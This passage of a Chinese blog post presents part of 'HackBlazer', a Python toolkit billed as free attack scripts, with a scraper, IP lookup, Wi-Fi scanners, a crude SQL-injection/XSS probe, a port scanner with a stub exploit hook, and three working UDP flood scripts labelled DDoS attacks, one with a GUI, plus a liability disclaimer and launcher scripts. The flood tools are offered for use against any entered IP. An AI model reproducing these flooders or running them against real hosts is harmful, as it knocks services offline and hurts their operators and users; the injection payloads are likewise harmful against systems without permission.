  43. video_label.pack(pady=20)
  44. except requests.RequestException as e:
  45. messagebox.showerror("错误", f"爬取视频时出错: {e}")
  46. if __name__ == "__main__":
  47. create_main_window()

16.爬取网页源代码

这个是"爬取网页源代码",一定要这样命名,不然用不了,后面自己加后缀!

  1. import requests
  2. print("<DigitalTrailBlazer>")
  3. def crawl_webpage_source(url):
  4. try:
  5. response = requests.get(url)
  6. response.raise_for_status() # 如果请求失败,抛出异常
  7. return response.text
  8. except requests.exceptions.RequestException as e:
  9. print(f"爬取网页时出错: {e}")
  10. return None
  11. def save_to_txt(content, file_path):
  12. with open(file_path, 'w', encoding='utf-8') as f:
  13. f.write(content)
  14. if __name__ == "__main__":
  15. url = input("请输入要爬取的网页地址: ")
  16. choice = input("请选择操作(1. 打印至终端;2. 下载至指定txt文件): ")
  17. source_code = crawl_webpage_source(url)
  18. if source_code:
  19. if choice == '1':
  20. print(source_code)
  21. elif choice == '2':
  22. file_path = input("请输入要保存的txt文件路径及文件名: ")
  23. save_to_txt(source_code, file_path)
  24. print(f"已成功将网页源代码保存至 {file_path}")

17.爬取网站ip

这个是"爬取网站IP",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. print("<DigitalTrailBlazer>")
  3. website_url = input("请输入网站地址 <<")
  4. try:
  5. ip_address = socket.gethostbyname(website_url)
  6. print(f"网站 {website_url} 对应的IP地址是: {ip_address}")
  7. except socket.gaierror as e:
  8. print(f"解析网站地址 {website_url} 出现错误: {e}")

18.扫描附近wifi第2版

这个是"扫描附近wifi第2版",一定要这样命名,不然用不了,后面自己加后缀!
第1版出现离奇的bug!所以没了。:)

  1. import pywifi
  2. from pywifi import const
  3. import time
  4. def scan_wifi():
  5. wifi = pywifi.PyWiFi()
  6. iface = wifi.interfaces()[0]
  7. iface.scan()
  8. time.sleep(2) # 等待扫描完成
  9. scan_results = iface.scan_results()
  10. return scan_results
  11. import tkinter as tk
  12. from tkinter import ttk
  13. def update_wifi_list():
  14. wifi_list.delete(*wifi_list.get_children()) # 清空表格
  15. results = scan_wifi()
  16. for result in results:
  17. wifi_list.insert("", "end", values=(result.bssid, result.ssid, result.signal))
  18. root = tk.Tk()
  19. root.title("WiFi Scan")
  20. label = tk.Label(root, text="<DigitalTrailBlazer>")
  21. label.pack(pady=20)
  22. # 创建表格
  23. wifi_list = ttk.Treeview(root, columns=("Address", "Name", "Signal"), show="headings")
  24. wifi_list.heading("Address", text="Address")
  25. wifi_list.heading("Name", text="Name")
  26. wifi_list.heading("Signal", text="Signal")
  27. wifi_list.pack(fill=tk.BOTH, expand=True)
  28. # 定时刷新
  29. root.after(5000, update_wifi_list) # 每5秒刷新一次
  30. root.mainloop()
  31. import threading
  32. def scan_wifi_thread():
  33. while True:
  34. update_wifi_list()
  35. root.after(5000) # 每5秒刷新一次
  36. thread = threading.Thread(target=scan_wifi_thread)
  37. thread.daemon = True
  38. thread.start()

19.扫描附近wifi第3版

这个是"扫描附近wifi第3版",一定要这样命名,不然用不了,后面自己加后缀!

  1. import pywifi
  2. from pywifi import const
  3. import time
  4. print("<DigitalTrailBlazer>")
  5. def scan_wifi():
  6. wifi = pywifi.PyWiFi()
  7. iface = wifi.interfaces()[0]
  8. iface.scan()
  9. time.sleep(2) # 等待扫描完成
  10. results = iface.scan_results()
  11. wifi_list = []
  12. for result in results:
  13. info = {
  14. 'address': result.bssid,
  15. 'ssid': result.ssid,
  16. 'signal': result.signal
  17. }
  18. wifi_list.append(info)
  19. return wifi_list
  20. if __name__ == "__main__":
  21. wifi_list = scan_wifi()
  22. for wifi in wifi_list:
  23. print(f"Address: {wifi['address']}, SSID: {wifi['ssid']}, Signal: {wifi['signal']}")

20.扫描漏洞

这个是"扫描漏洞",一定要这样命名,不然用不了,后面自己加后缀!

  1. import requests
  2. print("<DigitalTrailBlazer>")
  3. def scan_vulnerabilities(url):
  4. vulnerabilities = []
  5. # 示例:检查SQL注入漏洞
  6. sql_injection_url = url + "'"
  7. try:
  8. response = requests.get(sql_injection_url)
  9. if "You have an error in your SQL syntax" in response.text:
  10. vulnerabilities.append("SQL Injection Vulnerability")
  11. except requests.exceptions.RequestException as e:
  12. print(f"Error: {e}")
  13. # 示例:检查XSS漏洞
  14. xss_url = url + "<script>alert('XSS')</script>"
  15. try:
  16. response = requests.get(xss_url)
  17. if "<script>alert('XSS')</script>" in response.text:
  18. vulnerabilities.append("XSS Vulnerability")
  19. except requests.exceptions.RequestException as e:
  20. print(f"Error: {e}")
  21. return vulnerabilities
  22. def main():
  23. target_url = input("Enter the target URL: ")
  24. vulnerabilities = scan_vulnerabilities(target_url)
  25. if vulnerabilities:
  26. print("Vulnerabilities found:")
  27. for vuln in vulnerabilities:
  28. print(f"- {vuln}")
  29. else:
  30. print("No vulnerabilities found.")
  31. if __name__ == "__main__":
  32. main()

21.扫描指定ip漏洞工具

这个是"扫描指定ip漏洞工具",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import subprocess
  3. print("<DigitalTrailBlazer>")
  4. def scan_ports(ip, start_port, end_port):
  5. """扫描指定IP地址的端口"""
  6. open_ports = []
  7. for port in range(start_port, end_port + 1):
  8. try:
  9. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  10. sock.settimeout(1)
  11. result = sock.connect_ex((ip, port))
  12. if result == 0:
  13. open_ports.append(port)
  14. sock.close()
  15. except Exception as e:
  16. print(f"Error scanning port {port}: {e}")
  17. return open_ports
  18. def exploit_vulnerability(ip, port):
  19. """尝试利用已知漏洞"""
  20. print(f"Trying to exploit vulnerability on {ip}:{port}")
  21. # 这里可以添加具体的漏洞利用代码
  22. # 例如,使用Metasploit或其他漏洞利用工具
  23. # 这里只是一个示例,实际操作需要更复杂的逻辑
  24. pass
  25. def main():
  26. target_ip = input("ip <<") # 目标IP地址
  27. start_port = 1 # 开始端口
  28. end_port = 1024 # 结束端口
  29. print(f"Scanning ports {start_port}-{end_port} on {target_ip}")
  30. open_ports = scan_ports(target_ip, start_port, end_port)
  31. if open_ports:
  32. print(f"Open ports found: {open_ports}")
  33. for port in open_ports:
  34. exploit_vulnerability(target_ip, port)
  35. else:
  36. print("No open ports found.")
  37. if __name__ == "__main__":
  38. main()

22.DDoS攻击 第1版

这个是"DDoS攻击 第1版",一定要这样命名,不然用不了,后面自己加后缀!

  1. import os
  2. import socket
  3. import random
  4. from datetime import datetime
  5. print("<DigitalTrailBlazer>")
  6. now = datetime.now()
  7. hour = now.hour
  8. minute = now.minute
  9. day = now.day
  10. month = now.month
  11. year = now.year
  12. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  13. bytes = random._urandom(65099)
  14. ip = input("ip <<")
  15. port = 80
  16. sent = 0
  17. while True:
  18. sock.sendto(bytes, (ip, port))
  19. sent = sent + 1
  20. print("已发送 %s 个数据包到 %s 端口 %d" % (sent, ip, port))

23.DDoS攻击 第2版

这个是"DDoS攻击 第2版",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import time
  3. print("<DigitalTrailBlazer>")
  4. def send_udp_requests(ip, port, speed):
  5. # 创建UDP套接字
  6. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  7. packet_count = 0
  8. try:
  9. while True:
  10. # 构造一个简单的测试数据包,这里可以根据实际需求修改数据包内容
  11. data = b"Test UDP Packet"
  12. sock.sendto(data, (ip, port))
  13. packet_count += 1
  14. print(f"已发送第 {packet_count} 个数据包到 {ip}:{port}")
  15. time.sleep(1 / speed)
  16. except Exception as e:
  17. print(f"发生错误: {e}")
  18. finally:
  19. sock.close()
  20. if __name__ == "__main__":
  21. ip_address = input("请输入IP地址: ")
  22. port_number = int(input("请输入端口号: "))
  23. request_speed = int(input("请输入请求速度(每秒请求次数): "))
  24. send_udp_requests(ip_address, port_number, request_speed)

24.DDoS攻击 第3版

这个是"DDoS攻击 第3版",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import time
  3. import tkinter as tk
  4. from tkinter import ttk
  5. import threading
  6. def send_udp_requests(ip, port, speed):
  7. # 创建 UDP 套接字
  8. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  9. packet_count = 0
  10. try:
  11. while True:
  12. # 构造一个简单的测试数据包,这里可以根据实际需求修改数据包内容
  13. data = b"Test UDP Packet"
  14. start_time = time.time()
  15. sock.sendto(data, (ip, port))
  16. end_time = time.time()
  17. elapsed_time = end_time - start_time
  18. packet_count += 1
  19. status_label.config(text=f"已发送第 {packet_count} 个数据包到 {ip}:{port},耗时:{elapsed_time:.6f} 秒")
  20. time.sleep(1 / speed)
  21. except Exception as e:
  22. print(f"发生错误: {e}")
  23. finally:
  24. sock.close()
  25. def start_requests():
  26. ip = ip_entry.get()
  27. port = int(port_entry.get())
  28. speed = int(speed_entry.get())
  29. t = threading.Thread(target=send_udp_requests, args=(ip, port, speed))
  30. t.start()
  31. def adjust_opacity(value):
  32. root.attributes('-alpha', float(value))
  33. root = tk.Tk()
  34. root.title("DDOS工具")
  35. label = tk.Label(root, text="<DigitalTrailBlazer>")
  36. label.pack(pady=20)
  37. ip_label = tk.Label(root, text="请输入 IP 地址:")
  38. ip_label.pack()
  39. ip_entry = tk.Entry(root)
  40. ip_entry.pack()
  41. port_label = tk.Label(root, text="请输入端口号:")
  42. port_label.pack()
  43. port_entry = tk.Entry(root)
  44. port_entry.pack()
  45. speed_label = tk.Label(root, text="请输入请求速度(每秒请求次数):")
  46. speed_label.pack()
  47. speed_entry = tk.Entry(root)
  48. speed_entry.pack()
  49. start_button = tk.Button(root, text="开始请求", command=start_requests)
  50. start_button.pack()
  51. status_label = tk.Label(root, text="")
  52. status_label.pack()
  53. opacity_scale = ttk.Scale(root, from_=0.1, to=1.0, orient="horizontal", command=adjust_opacity)
  54. opacity_scale.set(1.0)
  55. opacity_scale.pack()
  56. root.mainloop()

25.DigitalTrailBlazer-hackblazer协议

这个是"DigitalTrailBlazer-hackblazer协议",一定要这样命名,不然用不了,后面自己加后缀!
一定要有!不然脚本不给启动

  1. "<DigitalTrailBlazer>"
  2. """DigitalTrailBlazer-hackblazer免责声明
  3. 本软件的使用受限于用户已获得合法授权,开发者不对用户授权的合法性进行审查,用户自行对因授权问题导致的法律后果负责。
  4. 使用本软件必须遵守所有适用的法律法规,包括但不限于国内法、国际法以及特定行业相关法规,用户若有违法使用行为,承担全部法律责任。
  5. 本软件可能存在未知漏洞或错误,尽管开发者尽力改进,但对于因这些问题导致的用户数据丢失、系统损坏或其他不良后果,开发者不承担责任。
  6. 用户不得将本软件用于任何非法目的,如网络犯罪、恶意攻击、未经授权的系统入侵等,否则将依法承担全部责任。
  7. 本软件仅供合法的安全测试、网络研究、企业内部安全评估等授权场景使用,未经授权用于其他目的属于用户违规行为。
  8. 在使用本软件进行操作时,用户应采取合理措施防止对目标系统造成损害,因用户疏忽造成的损失由用户自行承担。
  9. 对于因不可抗力(如自然灾害、战争、政府行为、网络故障等超出开发者控制范围的情况)导致的软件问题或用户损失,开发者不承担责任。
  10. 本软件的使用许可仅授予用户个人或特定授权实体,未经许可不得分发、共享、出租、出售本软件,否则用户承担侵权责任。
  11. 用户不得利用本软件对政府机构、军事设施、关键基础设施(能源、通信、金融等)进行未经授权的访问或攻击,否则自行承担法律后果。
  12. 本软件不保证与所有的操作系统、硬件设备或其他软件完全兼容,因兼容性问题导致的问题,开发者不承担责任。
  13. 用户使用本软件产生的任何直接或间接损失,包括但不限于经济损失、数据损失、业务中断等,开发者不承担赔偿责任。
  14. 开发者不承担因用户使用本软件对第三方造成损害而引发的任何责任,包括但不限于第三方索赔、诉讼等。
  15. 用户不得使用本软件收集、存储或传播违反隐私法规的个人信息,若有违反,用户承担责任。
  16. 若用户修改本软件或创建衍生作品且未获得开发者书面同意,将承担知识产权相关法律责任。
  17. 本软件仅作为一种工具提供,用户应对其使用行为和相关决策负责,开发者不对用户的决策失误承担责任。
  18. 用户不得使用本软件干扰或破坏其他软件、网络服务的正常运行,如有违反,自行承担后果。
  19. 对于因软件更新、升级或停用导致的用户不便或损失,开发者不承担责任,用户应自行备份数据。
  20. 用户在使用本软件过程中若遇到技术问题,开发者可提供有限支持,但不保证问题一定能解决。
  21. 本软件中的任何信息、数据或功能仅作为参考,用户不应完全依赖,因依赖产生的问题开发者不负责。
  22. 用户不得使用本软件绕过安全防护机制(如防火墙、认证系统等)进行非法活动,否则承担责任。
  23. 开发者不承担因用户在软件使用过程中违反道德准则或行业规范而产生的任何后果。
  24. 本软件可能会受到网络环境的影响,如网络延迟、丢包等,开发者不对由此产生的问题负责。
  25. 用户不得使用本软件对教育机构、医疗机构、公益组织等特殊保护对象进行未经授权的渗透测试。
  26. 若用户利用本软件进行商业间谍活动、不正当竞争等违法商业行为,将依法承担责任。
  27. 本软件的知识产权归开发者所有,用户不得删除、掩盖或篡改软件中的知识产权标识。
  28. 用户不得使用本软件故意制造虚假信息、误导用户或进行欺诈活动,否则承担法律责任。
  29. 在使用本软件进行渗透测试等操作时,应遵守相关的安全标准和规范,因违反导致的问题用户负责。
  30. 开发者有权根据法律法规、技术发展等情况对软件进行修改或终止服务,用户应接受。
  31. 用户在使用本软件前应仔细阅读本免责声明,继续使用表示用户接受所有条款。"""

26.game1

这个是"game1",一定要这样命名,不然用不了,后面自己加后缀!

  1. import random
  2. number1 = int(input("最小:"))
  3. number2 = int(input("最大:"))
  4. number_to_guess = random.randint(number1, number2)
  5. tries = 0
  6. print("欢迎来到猜数字游戏!我已经想好了一个",number1,"到",number2,"之间的数字,你来猜猜看。")
  7. while True:
  8. try:
  9. guess = int(input("请输入你的猜测:"))
  10. tries += 1
  11. if guess == number_to_guess:
  12. print(f"恭喜你,猜对了!你一共猜了 {tries} 次。")
  13. break
  14. elif guess < number_to_guess:
  15. print("猜的数字太小了,再试试吧。")
  16. else:
  17. print("猜的 数字太大了,再试试吧。")
  18. except ValueError:
  19. print("请输入一个有效的整数哦。")

27.HBuse

这个是"HBuse"

  1. import subprocess
  2. import time
  3. import sys
  4. import os
  5. os.system('cls' if os.name == 'nt' else 'clear')
  6. time.sleep(1)
  7. print("此程序由 DigitalTrailBlazer 团队提供技术支持")
  8. time.sleep(1)
  9. print("HackBlazer的调用程序")
  10. time.sleep(1)
  11. front_loaded_suffixPY = input("suffix <<")
  12. if front_loaded_suffixPY == "":
  13. front_loaded_suffixPY = ".py"
  14. suffixPY = front_loaded_suffixPY
  15. print("以默认后缀名为 '.py' !")
  16. print(front_loaded_suffixPY)
  17. time.sleep(1)
  18. while True:
  19. mainprogramcall = input("mainprogramcall <<")
  20. mainprogramcall1 = ["invoker -hackblazer","invoker -hb","invoker -HackBlazer","invoker -HB","invoker -HACKBLAZER"]
  21. if mainprogramcall in mainprogramcall1:#调用HackBlazer程序
  22. mainprogramcall_input_invoker = input("是否调用HackBlazer (y/n)")
  23. mainprogramcall2_y = ["y","yes","Y","YES"]
  24. mainprogramcall3_n = ["N","NO","n","no"]
  25. if mainprogramcall_input_invoker in mainprogramcall2_y:#调用HackBlazer - y
  26. file_path = ("HackBlazerM" + front_loaded_suffixPY)
  27. if os.path.exists(file_path):#检查文件是否存在
  28. print("文件正常")
  29. print("正在调用HackBlazer")
  30. time.sleep(1)
  31. def run_in_new_console(command):
  32. # 使用subprocess.Popen创建新进程,并指定创建新控制台窗口
  33. process = subprocess.Popen(command, creationflags=subprocess.CREATE_NEW_CONSOLE)
  34. return process
  35. if __name__ == "__main__":
  36. # 定义要运行的命令
  37. command = ["python", "HBuse2" + front_loaded_suffixPY] # 替换为你要运行的脚本
  38. run_in_new_console(command)
  39. else:#文件不正常
  40. print("文件不正常")
  41. if mainprogramcall_input_invoker in mainprogramcall3_n:#调用HackBlazer - n
  42. print("已取消调用HackBlazer")
  43. if mainprogramcall == "suffix":#更改后缀名
  44. front_loaded_suffixPY = input("suffix <<")
  45. print("已更改后缀名为 " + front_loaded_suffixPY)
  46. print("需要重启程序")
  47. subprocess.call(["python","HBuse"+front_loaded_suffixPY])
  48. target_strings3 = ["cls", "clear", "clear screen", "cls screen"]
  49. if mainprogramcall in target_strings3:#清屏
  50. os.system('cls' if os.name == 'nt' else 'clear')
  51. if mainprogramcall == "exit()":
  52. print("已退出")
  53. sys.exit()

28.HBuse2

这个是"HBuse2"

  1. import subprocess
  2. suffixPY = input("suffix <<")
  3. if suffixPY == "":
  4. suffixPY = ".py"
  5. print(f"以默认后缀名为 {suffixPY} !")
  6. def run_in_new_console(command):
  7. # 使用subprocess.Popen创建新进程,并指定创建新控制台窗口
  8. process = subprocess.Popen(command, creationflags=subprocess.CREATE_NEW_CONSOLE)
  9. return process
  10. if __name__ == "__main__":
  11. # 定义要运行的命令
  12. command = ["python", "hackblazerM" + suffixPY] # 替换为你要运行的脚本
  13. # 在新终端窗口中运行命令
  14. run_in_new_console(command)
标签: 开源 windows python

本文转载自: https://blog.csdn.net/YoMon1564/article/details/143998723
版权归原作者 YoMon1564 所有, 如有侵权,请联系我们删除。

“HackBlazer 纯python3.11.9免费开源攻击脚本Windows版”的评论:

还没有评论